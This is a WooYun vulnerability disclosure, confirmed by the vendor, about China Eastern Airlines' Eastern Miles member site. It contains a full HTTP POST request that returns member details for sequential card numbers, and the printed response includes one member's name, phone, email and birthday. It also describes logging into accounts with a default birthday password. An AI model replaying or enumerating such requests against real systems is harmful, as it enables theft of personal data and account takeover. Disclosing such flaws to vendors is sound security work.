当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158727

漏洞标题:中国东方航空股份有限公司从泄露部分信息/到任意登录/泄露全部信息/到任意密码修改

相关厂商:中国东方航空股份有限公司

漏洞作者: 逆流冰河

提交时间:2015-12-07 12:22

修复时间:2016-01-21 12:50

公开时间:2016-01-21 12:50

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

如题

详细说明:

1,首先说几点在继续,
1)首页登录的验证码是个伪验证码,没有任何意义。
2)登录是密码只能是8位数字,爆破起来很简单,
我没有爆破,就顺着泄露信息开始吧
2,利用如下的代码,替换卡号,就能获取用户的生日,卡号不是相连的
等差数列,累计加7,从613012100006开始

POST http://easternmiles.ceair.com/mpf/password/valid HTTP/1.1
Host: easternmiles.ceair.com
Connection: keep-alive
Content-Length: 75
Accept: application/json, text/plain, */*
Origin: http://easternmiles.ceair.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://easternmiles.ceair.com/mpf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _pzfxuvpc=1449366889445%7C2159427813641230921%7C1%7C1449366889450%7C1%7C%7C1091860916865261418; _pzfxsfc=k29901466628.a9225815834.u3875679.pb; __utma=101442195.1596813777.1449366889.1449366889.1449366889.1; __utmc=101442195; __utmz=101442195.1449366889.1.1.utmcsr=baidu_pc|utmccn=XdonghangPZC|utmcmd=cpc|utmctr=东方航空|utmcct=品专-东航; BC_HA_e2272b3b6717432b_66667000=7440; UUID=27A2C8842B7E4BFB975153C4530B2562; BC_HA_963a129226544986_66667000=1CAC01
{"changeType":"1","cardType1":"1","cardType2":"1","cardNo1":"613012100048"}


结果:

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Sun, 06 Dec 2015 03:16:36 GMT
Content-Type: application/json;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: Keep-Alive
Set-Cookie: BC_HA_963a129226544986_66667000=1CAC01; Domain=.ceair.com; expires=Sun, 06-Dec-15 03:46:37 GMT; Path=/
Content-Length: 421
{"memberId":"613012100048","lang":"zh_CN","companyCode":"MU","programCode":"CEAEM","exception":null,"changeType":"1","code":null,"id":-1,"cardNo1":"613012100048","cardType1":1,"sendType1":"1","mobile1":"13462591134","email1":"[email protected]","birthdayStr":"19931228","cardNo2":null,"cardType2":1,"sendType2":"1","memberId2":null,"mobile2":null,"email2":null,"memberName":"陈秋旭","oldPW":null,"newPW":null,"flag":0}


3,随便获取了上面的这个
卡号:613012100048 生日:19931228
4,这个网站默认的用户名和密码是:卡号和生日,于是我就试了试

11111.png


登录成功

22222.png


5,看看个人信息

33333.png


6,个人密码可以修改,我就不能演示了

漏洞证明:

Fix

修复方案:

Fix

版权声明:转载请注明来源 逆流冰河@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-07 12:49

厂商回复:

十分感谢!

最新状态:

暂无